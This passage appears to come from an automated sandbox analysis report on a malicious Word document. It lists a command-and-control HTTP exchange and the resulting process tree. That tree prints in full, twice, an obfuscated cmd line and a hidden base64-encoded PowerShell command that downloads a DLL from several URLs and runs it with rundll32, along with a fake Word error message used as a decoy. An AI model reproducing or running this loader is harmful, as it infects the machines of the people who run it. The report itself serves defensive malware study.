                      DNT: 0
                      Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/
                      Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 69.49.88.46
                      Content-Length: 5492
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Jan 12, 2021 20:31:37.310410976 CET365INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 12 Jan 2021 19:31:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Vary: Accept-Encoding
                      Data Raw: 66 30 34 0d 0a 5c b4 e8 0a df c8 fc 15 5f 14 03 90 17 91 42 95 bb 60 9b 10 9a 31 8d f3 aa e5 ca 57 d1 60 dc 2a 41 15 f0 08 8c 83 69 a7 3e 6e 91 b1 28 72 e9 02 0f d2 29 ab dc 4e e4 d8 82 38 74 3c b7 d7 70 98 a0 07 f2 2a e1 a8 15 da d3 60 74 37 51 a7 33 46 fb 40 f6 9d 64 40 be 1d 2a 15 09 7e 09 d0 1d 3c 49 e9 08 d7 30 aa 4b fb 05 91 50 2b d7 39 13 2a 6d 3c f5 e4 bd 5c 37 20 7d a6 2e b0 32 8d ec 9b e0 17 e8 8f b6 02 1b 91 9a 06 5b a8 35 10 4d db b4 8c 1d 85 7a 70 9a 1e fb b3 9b 01 80 2a 15 4f 86 81 0f 9a 03 8e 86 62 9b ba 01 61 eb a6 b2 7d a9 7b 65 4b e5 d5 28 ee 2a 77 71 59 7e d9 b8 ef a3 b7 93 25 49 cc b8 76 8d 68 41 4e 7e 19 45 99 14 c0 e5 b1 ef d4 24 5b a4 6d 8e c4 f2 ac 70 28 3d 60 1b 6a 87 dd ca c3 fa 6d 58 4b ba 20 a3 51 19 f1 ea e9 00 54 52 62 a8 de a7 fd d2 a4 f7 a6 b3 2c 55 cb 25 8d 8b 94 58 ff c3 bb f2 af 34 8b 7f 1f 1c 1e 32 14 48 93 36 bc b5 78 ab a5 46 33 2f 34 8d c0 cd 2a eb 75 b0 d9 7b 8d 34 21 c0 20 84 0a 0b f8 9f c3 35 d8 a8 ef 4c 21 9d dd 3e dc 59 91 7a b3 8c f1 85 aa 2f 0c d8 62 a4 13 1d ed 7b f9 d9 8d 53 3a a6 3e 5c 4a e1 3a 00 62 19 b7 8a 3c 2d 43 aa ba 94 4f 74 23 00 7f 39 2b dc 08 38 b5 8b 60 13 aa 85 fd 7c 75 fc ba 9b 0f 87 21 ca 99 7b 5f 31 ee 73 68 01 87 a9 9f 9b a0 79 ef 78 b0 8f 66 a3 f7 d1 02 39 52 2f f1 09 2c 52 56 58 b3 b5 a4 d7 f2 89 1d e2 6e 2e c2 4d 96 7b fa 37 99 c7 7c 36 e2 24 f7 0b 77 62 69 be 7f d1 cf 5a 22 60 39 11 7e 2a fc 94 25 9c 3f 79 15 50 2a 34 6c a0 15 d6 8c 8f 53 21 eb 67 2d b1 ee d8 43 30 f1 bb cb 7c d6 cd 1e 75 2b 45 bf d4 2b 88 c1 7f 77 4f 23 fe 8b 63 24 62 2b d9 87 f9 9a fd 9c 5c b7 45 47 72 19 d7 40 4a 78 66 3b 5b 6e e7 96 4a c2 48 24 15 ff e7 99 e9 07 5a 1e 8d 85 e7 ee 0a 83 46 93 63 82 76 7a ff 20 4c 6b 0a b6 1f 40 af 92 7d 49 7c a5 00 15 f6 3a 21 14 95 44 0e a9 e4 1d f3 69 1e 88 f4 f9 2d 7c 4f 3f 2e a3 a9 d1 80 08 11 3d 75 b3 dd 32 9f 91 02 62 66 34 25 74 ec a3 d9 d9 70 46 54 11 63 76 42 da cc 5d 85 22 60 e9 27 1f cc 02 c9 e7 fc 51 a4 1d 1e e3 9f 0c 3b ec 7c ed 81 8f 48 63 13 ce 0f d5 2e 54 d7 fd 43 0d 81 b7 70 ab 2c b1 57 57 c4 26 e8 33 f0 25 fa 01 1e 47 28 bd cb ab 6d 8c e2 7e b2 dd ae 4e 20 22 6e af 53 0c 53 28 ea 98 d9 e0 e4 7b 70 c4 d1 db ad 5d 0c 16 40 dc 43 e5 bf b4 e2 db 78 a2 a9 ad ae 0f 3b af 8f 66 e1 b3 34 97 41 7d b1 45 0f 33 ef 53 1f 27 b5 06 10 b6 a5 2f 24 e9 27 89 14 8b 48 69 0e 69 66 f8 ee 9e de 5d a3 ca 7a f6 77 57 4b 59 96 5c 8c 99 8b 18 e8 de 20 6f 8b 1f 30 c0 29 8f 2e ee c1 cb d8 1b 1d 73 b7 78 a6 1a 0c 28 c6 8a 82 09 01 0e e0 d2 8f a1 78 8c d2 f4 f6 b9 18 58 d7 94 d2 00 2d b4 ea 85 60 20 c9 dc 37 c2 a8 a7 b4 5e b5 06 08 8f 69 dc 9b b6 1f 3b 02 31 c2 21 26 eb 69 6a 09 ec 89 06 73 49 16 83 63 78 bb 4a d7 1a 01 4b a8 02 d1 61 55 92 3f 30 52 f9 91 e5 3d fc 91 b4 f0 32 e2 90 86 d8 94 f6 db e0 ae 9e 12 a3 87 17 99 ab 97 8b a5 5a de 5b 4c 32 39 58 94 ef 1b 71 02 74 c6 9f f5 56 8a 10 e6 4e b1 b7 43 49 b2 1a 79 6b 22 37 8a c0 85 00 2b 7f 52 f5 de dd ac a5 90 3d 2a 1d f5 59 a7 2c 7e ee a9 11 7f 05 82 81 ce 5d fd 09 06 f5 e4 fb f0 1c 13 d5 d2 64 94 c1 f1 85 ec 84 11 ce 22 52 82 15 2d b4 a2 f1 0f d4 b0 08 b3 c2 f9 83 39 a1 2b 05 44 db 95 53 16 9d f5 62 1d e0 bb 89 97 a4 f5 32 99 27 ca 0b 22 03 3a b1 df 8b a2 ca a7 1e 77 6c 5b 36 bd 12 42 19 ff 20 86 5d 8b 0b 04 c6 af 05 ca cf 46 5d dc e3 c9 f2 f6 fa 05 2d 88 87 bf 2a 65 28 ce 9b 59 e3 06 c2 df 82 1b ac 8d 8b 64 1d b2 23 6e 43 07 31 82 62 a4 e2 7b 52 da 25 48 2f 12 2b 06 79 20 ee cd 6b 1a 43 f7 b7 17 5e 48 f9 35 bf 34 85 46 f3 8e 01 53 7e c1 00 d6 bc f8 f7 92 c7 af 8e 73 64 7b 63 1e
                      Data Ascii: f04\_B`1W`*Ai>n(r)N8t<p*`t7Q3F@d@*~<I0KP+9*m<\7 }.2[5Mzp*Oba}{eK(*wqY~%IvhAN~E$[mp(=`jmXK QTRb,U%X42H6xF3/4*u{4! 5L!>Yz/b{S:>\J:b<-COt#9+8`|u!{_1shyxf9R/,RVXn.M{7|6$wbiZ"`9~*%?yP*4lS!g-C0|u+E+wO#c$b+\EGr@Jxf;[nJH$ZFcvz Lk@}I|:!Di-|O?.=u2bf4%tpFTcvB]"`'Q;|Hc.TCp,WW&3%G(m~N "nSS({p]@Cx;f4A}E3S'/$'Hiif]zwWKY\ o0).sx(xX-` 7^i;1!&ijsIcxJKaU?0R=2Z[L29XqtVNCIyk"7+R=*Y,~]d"R-9+DSb2'":wl[6B ]F]-*e(Yd#nC1b{R%H/+y kC^H54FS~sd{c


                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:20:30:34
                      Start date:12/01/2021
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase:0x13f120000
                      File size:1424032 bytes
                      MD5 hash:95C38D04597050285A18F66039EDB456
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:20:30:35
                      Start date:12/01/2021
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
                      Imagebase:0x4a3f0000
                      File size:345088 bytes
                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:36
                      Start date:12/01/2021
                      Path:C:\Windows\System32\msg.exe
                      Wow64 process (32bit):false
                      Commandline:msg user /v Word experienced an error trying to open the file.
                      Imagebase:0xff0f0000
                      File size:26112 bytes
                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:36
                      Start date:12/01/2021
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
                      Imagebase:0x13fab0000
                      File size:473600 bytes
                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0xffdd0000
                      File size:45568 bytes
                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:41
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:42
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:43
